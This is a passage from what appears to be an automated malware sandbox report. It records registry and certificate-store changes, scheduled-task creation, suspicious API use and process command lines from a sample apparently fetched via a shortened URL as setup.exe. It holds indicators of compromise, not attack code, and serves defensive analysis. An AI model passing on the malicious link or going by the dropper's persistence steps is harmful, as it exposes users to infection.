| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-514081398-208714212-3319599467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\setup_34Uv1hLE7B.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1IZk
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd200c3cb8,0x7ffd200c3cc8,0x7ffd200c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
